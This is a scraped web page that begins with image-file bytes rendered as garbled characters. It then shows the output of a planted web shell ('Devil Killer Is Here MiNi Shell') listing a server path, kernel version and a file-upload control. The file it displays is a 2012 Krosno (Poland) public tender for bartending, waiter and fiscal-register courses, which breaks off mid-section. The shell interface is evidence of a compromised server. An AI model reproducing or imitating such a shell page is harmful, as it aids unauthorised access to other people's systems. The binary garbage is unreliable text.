JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121001/208827-N-2012.html

<p class="kh_header"><b>Krosno: Usługa edukacyjna obejmująca organizację i prowadzenie w roku szkolnym 2012/2013 kursów specjalistycznych: barmańskiego, kelnerskiego oraz obsługi kas fiskalnych, zakładania i prowadzenia własnej firmy dla uczestników projektu pn. Podkarpacie stawia na zawodowców współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX  Rozwój wykształcenia i kompetencji w regionach, 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego w ramach projektu pn. Podkarpacie stawia na zawodowców</b><br>
<b>Numer ogłoszenia: 208827 - 2012; data zamieszczenia: 01.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krosno , ul. Lwowska 28a, 38-400 Krosno, woj. podkarpackie, tel. 13 47 43 312, faks 13 47 43 312.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krosno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa edukacyjna obejmująca organizację i prowadzenie w roku szkolnym 2012/2013 kursów specjalistycznych: barmańskiego, kelnerskiego oraz obsługi kas fiskalnych, zakładania i prowadzenia własnej firmy dla uczestników projektu pn. Podkarpacie stawia na zawodowców współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX  Rozwój wykształcenia i kompetencji w regionach, 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego w ramach projektu pn. Podkarpacie stawia na zawodowców.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia został podzielony na 3 części, które będą realizowane w Zespole Szkół Ponadgimnazjalnych Nr 2 w Krośnie przy ul. Szpetnara 9. 

CZĘŚĆ I
Organizacja i przeprowadzenie kursu barmańskiego na poziomie podstawowym dla uczniów Zespołu Szkół Ponadgimnazjalnych Nr 2.
Kurs powinien obejmować zajęcia teoretyczne i praktyczne, godzina zajęć teoretycznych obejmuje 45 minut zajęć, natomiast godzina zajęć praktycznych obejmuje 60 minut zajęć. Długość przerw będzie ustalana w sposób elastyczny przez wykonawcę.

-liczba grup  - 1,
-liczba uczniów  w grupie - 8,
-liczba godzin kursu - 50 h łącznie, w tym 25 h zajęć praktycznych,
-planowany termin kursu: X-XII 2012r.,
-kurs powinien odbywać się w dni robocze oraz w soboty i/lub w niedziele. 
Dzienna liczba godzin dydaktycznych kursu może wynosić minimum 3 godziny, a maksimum 8 godzin. Harmonogram kursu musi być dostosowany do planu lekcji uczniów i uzgodniony z koordynatorem szkolnym i dyrektorem szkoły;

Wykonawca obowiązany jest opracować autorski program kursu, który będzie obejmował co najmniej niżej wskazane moduły: 
1.Wprowadzenie do zawodu barmana,
2.Terminologia i funkcjonowanie sprzętu barowego oraz rodzaje stosowanego szkła i miar barowych,
3.Alkoholoznawstwo,
4.Miksologia - zasady komponowania napojów mieszanych,
5.Zajęcia z miksologii,
6.Zasady podawania napojów alkoholowych,
7.Dekoracje,
8.Odpowiedzialne serwowanie alkoholu,
9.Obsługa gości,
10.Organizacja baru i pracy barmana (w tym podstawy zarządzania barem),
11.Podstawowe triki barmańskie.
Wykonawca zobowiązany jest do przedstawienia koordynatorowi szkolnemu i dyrektorowi szkoły programu i wstępnego harmonogramu kursu najpóźniej dzień przed rozpoczęciem kursu - celem zaakceptowania.

Kurs winien zakończyć się egzaminem wewnętrznym sprawdzającym umiejętności kursantów. Na tej podstawie powinny być wydane stosowne dokumenty świadczące o ukończeniu kursu np: zaświadczenia, świadectwa, certyfikaty itp. 

Wykonawca zapewni każdemu uczestnikowi kursu:
- materiały szkoleniowe na zajęcia praktyczne i teoretyczne, materiały piśmiennicze potrzebne do prowadzenia notatek (notatnik, długopis);
-wykonawca zapewni swój sprzęt szkoleniowy, niezbędny do przeprowadzenia kursu,
-wykonawca zapewni w cenie kursu kawę, herbatę, wodę, susz konferencyjny, a w przypadku zajęć trwających dłużej niż 5 godzin, wykonawca zapewni jeden gorący posiłek dla uczestników projektu.

Wykonawca wliczy w cenę szkolenia również inne koszty, które uzna za niezbędne do przeprowadzenia przedmiotowych warsztatów.

Zajęcia będą  prowadzone w salach dydaktycznych ZSP Nr 2, wyposażonych w miejsca do siedzenia, pisania i prowadzenia zajęć, przystosowane dla odpowiedniej liczby uczestników, wyposażone w odpowiedni sprzęt techniczno-dydaktyczny. 

CZĘŚĆ II
Organizacja i przeprowadzenie kursu kelnerskiego na poziomie podstawowym dla uczniów Zespołu Szkół Ponadgimnazjalnych Nr 2.
Kurs powinien obejmować zajęcia teoretyczne i praktyczne, godzina zajęć teoretycznych obejmuje 45 minut zajęć, natomiast godzina zajęć praktycznych obejmuje 60 minut zajęć. Długość przerw jest ustalana w sposób elastyczny przez wykonawcę.

-liczba grup  - 1,
-liczba uczniów  w grupie - 8,
-liczba godzin kursu - 50 h łącznie, w tym 25 h zajęć praktycznych,
-planowany termin kursu: X-XII 2012r.

Kurs powinien odbywać się w dni robocze oraz w soboty i/lub w niedziele. Dzienna liczba godzin dydaktycznych kursu może wynosić minimum 3 godziny, a maksimum 8 godzin. Harmonogram kursu musi być dostosowany do planu lekcji uczniów i uzgodniony z koordynatorem szkolnym i dyrektorem szkoły.

Wykonawca obowiązany jest opracować autorski program kursu, który będzie obejmował co najmniej niżej wskazane moduły: 
1. obsługa kelnerska gości, 
2. savoir vivre, 
3. nakrywanie do stołu, 
4. serwowanie potraw i napojów, 
5. organizowanie różnych form przyjęć i bankietów,
6. przygotowanie sali konsumenckiej do obsługi, 
7. techniki noszenia naczyń itp.
8. system rozliczeń kelnerskich.

Wykonawca zobowiązany jest do przedstawienia koordynatorowi szkolnemu i dyrektorowi szkoły programu i wstępnego harmonogramu kursu najpóźniej dzień przed rozpoczęciem kursu - celem zaakceptowania.

Kurs winien zakończyć się egzaminem wewnętrznym sprawdzającym umiejętności kursantów. Na tej podstawie powinny być wydane stosowne dokumenty świadczące o ukończeniu kursu np: zaświadczenia, świadectwa, certyfikaty itp. 

Wykonawca zapewni każdemu uczestnikowi kursu:
- materiały szkoleniowe na zajęcia praktyczne i teoretyczne, materiały piśmiennicze potrzebne do prowadzenia notatek (notatnik, długopis);
-wykonawca zapewni swój sprzęt szkoleniowy, niezbędny do przeprowadzenia kursu,
-wykonawca zapewni w cenie kursu kawę, herbatę, wodę, susz konferencyjny, a w przypadku zajęć trwających dłużej niż 5 godzin, wykonawca zapewni jeden gorący posiłek dla uczestników projektu.

Wykonawca wliczy w cenę szkolenia również inne koszty, które uzna za niezbędne do przeprowadzenia przedmiotowych warsztatów.

Zajęcia będą  prowadzone w salach dydaktycznych ZSP Nr 2, wyposażonych w miejsca do siedzenia, pisania i prowadzenia zajęć, przystosowane dla odpowiedniej liczby uczestników, wyposażone w odpowiedni sprzęt techniczno-dydaktyczny. 

CZĘŚĆ  III
Organizacja i przeprowadzenie kursu obsługi kas fiskalnych, zakładania i prowadzenia własnej firmy  dla uczniów Zespołu Szkół Ponadgimnazjalnych Nr 2.
Kurs powinien obejmować zajęcia teoretyczne i praktyczne, godzina zajęć teoretycznych obejmuje 45 minut zajęć, natomiast godzina zajęć praktycznych obejmuje 60 minut zajęć. Długość przerw jest ustalana w sposób elastyczny przez wykonawcę.
-liczba grup  - 1,
-liczba uczniów  w grupie - 8,
-liczba godzin kursu  - 50 h łącznie, w tym 25 h zajęć praktycznych,
-planowany termin kursu: X-XII.2012r.

Kurs powinien odbywać się w dni robocze oraz w soboty i/lub w niedziele. Dzienna liczba godzin dydaktycznych kursu może wynosić minimum 3 godziny, a maksimum 8 godzin. Harmonogram kursu musi być dostosowany do planu lekcji uczniów i uzgodniony z koordynatorem szkolnym i dyrektorem szkoły.

Wykonawca obowiązany jest opracować autorski program kursu, który będzie obejmował co najmniej niżej wskazane moduły: 
1. moduł kasy fiskalne: 
a)  podstawowe akty prawne związane ze stosowaniem kas fiskalnych, budowa i  zasady ich działania, 
b) przygotowanie kasy do pracy,
c) praktyczne ćwiczenia sprzedaży z zastosowaniem kas fiskalnych, 
d) współpraca kas z urządzeniami dodatkowymi: np. czytnikiem kodów, komputerem. 
e) rozpoznawanie i kontrola znaków pieniężnych, 
f) fakturowanie - obsługa programu Subiekt. 

2. moduł SUBIEKT GT: 
a) zakładanie kartotek magazynowych towarów, 
b) tworzenie kartotek kontrahentów, 
c) kalkulacja cen, 
d) wystawianie dowodów magazynowych i faktury VAT sprzedaży. 

3. moduł zakładania i prowadzenia własnej firmy:
a) ogólne zasady ekonomiczne i prawne;
b) wybór formy organizacyjno-prawnej,
c) rozpoznanie rynku,
d) analiza marketingowa,
e)biznes plan,
f) rejestracja przedsiębiorstwa,
g) działalność gospodarcza przedsiębiorstwa.

Wykonawca zobowiązany jest do przedstawienia koordynatorowi szkolnemu i dyrektorowi szkoły programu i wstępnego harmonogramu kursu najpóźniej dzień przed rozpoczęciem kursu - celem zaakceptowania.

Kurs winien zakończyć się egzaminem wewnętrznym sprawdzającym umiejętności kursantów. Na tej podstawie powinny być wydane stosowne dokumenty świadczące o ukończeniu kursu np: zaświadczenia, świadectwa, certyfikaty itp. 

Wykonawca zapewni każdemu uczestnikowi kursu:
- materiały szkoleniowe na zajęcia praktyczne i teoretyczne, materiały piśmiennicze potrzebne do prowadzenia notatek (notatnik, długopis);
-wykonawca zapewni swój sprzęt szkoleniowy,
-wykonawca zapewni w cenie kursu kawę, herbatę, wodę, susz konferencyjny, a w przypadku zajęć trwających dłużej niż 5 godzin, wykonawca zapewni jeden gorący posiłek dla uczestników projektu.

Wykonawca wliczy w cenę szkolenia również inne koszty, które uzna za niezbędne do przeprowadzenia przedmiotowych warsztatów.

Zajęcia będą  prowadzone w salach dydaktycznych ZSP Nr 2, wyposażonych w miejsca do siedzenia, pisania i prowadzenia zajęć, przystosowane dla odpowiedniej liczby uczestników, wyposażone w odpowiedni sprzęt techniczno-dydaktyczny. 

Reasumując:
Wykonawca jest zobowiązany do:
-organizacji i przeprowadzenia w roku szkolnym 2012/2013 kursów: barmańskiego, kelnerskiego  oraz obsługi kas fiskalnych, obsługi kas fiskalnych, zakładania i prowadzenia własnej firmy, w wymiarze godzin przewidzianych dla każdego rodzaju kursu i dla danej grupy uczniów;
-opracowania autorskich programów kursów zawierających określone moduły i przedstawienia do akceptacji koordynatorowi szkolnemu i dyrektorowi szkoły;
-opracowania szczegółowego harmonogramu prowadzenia zajęć w uzgodnieniu z koordynatorem szkolnym i dyrektorem szkoły, zgodnie z założeniami wniosku o dofinansowanie realizacji projektu; 
-uzgadniania z koordynatorem szkolnym oraz z dyrektorem szkoły wszelkich zmian harmonogramu wynikających z zaistnienia ważnych powodów; 
-przedstawienie koordynatorowi szkolnemu i  dyrektorowi szkoły, celem zaakceptowania, najpóźniej dzień przed rozpoczęciem kursu, programu i wstępnego harmonogramu kursu,
-w pierwszym dniu, przed rozpoczęciem kursu, zapoznanie uczestników z jego szczegółowym programem oraz przekazanie im harmonogramu realizowanych zajęć,
-na zakończenie kursu przeprowadzenie egzaminu wewnętrznego sprawdzającego umiejętności kursantów. Na tej podstawie powinny być wydane stosowne dokumenty świadczące o ukończeniu kursu np: zaświadczenia, świadectwa, certyfikaty itp.;
-zapewnienie każdemu uczestnikowi kursu materiałów szkoleniowych na zajęcia praktyczne i teoretyczne, materiałów piśmienniczych potrzebnych do prowadzenia notatek (notatnik, długopis), 
-zapewnienia  swojego sprzętu szkoleniowego, niezbędnego do przeprowadzenia danego kursu;
-zapewnienia  w cenie kursu kawę, herbatę, wodę, susz konferencyjny, a w przypadku zajęć trwających dłużej niż 5 godzin, zapewnienia 1 gorącego posiłku (catering) dla uczestników projektu,
-prowadzenia dokumentacji przebiegu kursu stanowiącej: dziennik zajęć edukacyjnych zawierający wymiar godzin i tematy zajęć edukacyjnych, listę obecności, protokół z przebiegu egzaminu wewnętrznego, imienny wykaz osób, które ukończyły kurs, nie ukończyły kursu, nie zdały egzaminu, bądź nie przystąpiły do egzaminu, rejestr wydanych zaświadczeń potwierdzających ukończenie kursu i uzyskanie kwalifikacji,
-przestrzegania zasady równości szans, w tym równości płci w czasie przeprowadzonego kursu,
-zgłaszania ewentualnych problemów, nieprawidłowości niezwłocznie po zaobserwowaniu ich występowania,
-przedstawienia koordynatorowi szkolnemu, na zakończenie kursu, list obecności uczestników kursu, potwierdzonych własnoręcznym podpisem osób skierowanych na kurs oraz podpisem osoby prowadzącej kurs,
-bieżącego informowania koordynatora szkolnego o każdej nieobecności uczestnika na kursie,
-zawiadomienia koordynatora szkolnego i dyrektora szkoły o terminie i godzinie egzaminu wewnętrznego, 
-wydane certyfikaty oraz zaświadczenia muszą zawierać logotypy zgodnie z aktualnymi wytycznymi oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego (nie dotyczy certyfikatów zaświadczeń, których wzory zostały określone odpowiednimi przepisami),
-wszystkie dokumenty dotyczące realizacji kursu będą zawierały informację o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
- w pomieszczeniach, w których będą realizowane kursy będą umieszczone informacje o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 

Zamawiający zapewnia:
-ubezpieczenie uczestników kursów od następstw nieszczęśliwych wypadków na czas trwania kursu, zgodnie z wykazem osób przedstawionym przez Zamawiającego, złożonym przed rozpoczęciem kursu.
-nieodpłatnie pomieszczenia do przeprowadzenia wszystkich kursów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony o ile wykonawca wykaże, iż zrealizował w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej dwa: 
a)  kursy barmańskie - dotyczy Części I;
b)  kursy kelnerskie - dotyczy Części II;
c) kursy obsługi kas fiskalnych, prowadzenia i zakładania własnej firmy - dotyczy Części III;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo: oferta musi być podpisana przez osobę/osoby wykonawcy uprawnioną/ne do zaciągania zobowiązań w Jego imieniu bądź przez ustanowionego przez nią/nie pełnomocnika/ów.
Wykonawcy składający ofertę wspólną są zobowiązani do ustanowienia pełnomocnika. 
Pełnomocnictwo może dotyczyć zarówno reprezentowania wszystkich wykonawców składających wspólną ofertę w postępowaniu o udzielenie zamówienia publicznego, jak i podpisania w ich imieniu umowy o zamówienie publiczne. Jeżeli pełnomocnictwo upoważnia jedynie do reprezentowania wykonawców w postępowaniu, to przed podpisaniem umowy z Zamawiającym wymagane będzie złożenie umowy, w której określone będą prawa i obowiązki poszczególnych wykonawców.
Pełnomocnictwo musi wskazywać pełnomocnika (w tym zakres jego umocowania), a także wskazywać wszystkich wykonawców wspólnie ubiegających się o zamówienie. 
Pełnomocnictwo musi być podpisane przez osoby wykonawców składających wspólną ofertę uprawnione do zaciągania zobowiązań w jego imieniu. 
Pełnomocnictwo, o którym mowa w niniejszym punkcie musi zostać złożone wraz z ofertą w formie oryginału lub kopii poświadczonej notarialnie.
Korespondencja z Zamawiającym oraz rozliczenia z wykonawcami dokonywane będą przez pełnomocnika wskazanego pełnomocnictwem. 
Podmiot składający ofertę jako uczestnik konsorcjum i jednocześnie składający ofertę samodzielnie lub jako uczestnik innego konsorcjum zostanie potraktowany jako składający dwie oferty i na tej podstawie wszystkie oferty z Jego udziałem zostaną odrzucone. Zasady podpisywania oferty dotyczą wszystkich jej dokumentów (informacji, wykazów, oświadczeń) oraz potwierdzania za zgodność z oryginałem składanych kopii</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następującym zakresie:
1. Termin realizacji zamówienia może ulec zmianie w następujących sytuacjach: 
a)	w przypadku opóźnienia Zamawiającego w rozstrzygnięciu przetargu i/lub podpisaniu umowy,
b)	w przypadku zawieszenia usług przez Zamawiającego.
2. Wynagrodzenie Wykonawcy określone w umowie może ulec zmianom w następujących przypadkach:
a)	zmiana stawki urzędowej podatku VAT,
b)	rezygnacji z części zamówienia, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy lub której wykonanie nie będzie konieczne lub będzie bezcelowe w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy - o wartość niewykonanych usług.
3. Warunki zmian:
a)	inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
b)	uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych usług,
c)	forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krosno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można odebrać w siedzibie Zamawiającego - pokój nr 326, przy ul. Lwowskiej 28a w Krośnie - III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2012 godzina 10:00, miejsce: Krosno, ul. Lwowska 28a, Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Podkarpacie stawia na zawodowców jest współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX  Rozwój wykształcenia i kompetencji w regionach,  Działanie 9.2 
Sposób porozumiewania się Zamawiającego z wykonawcami: 
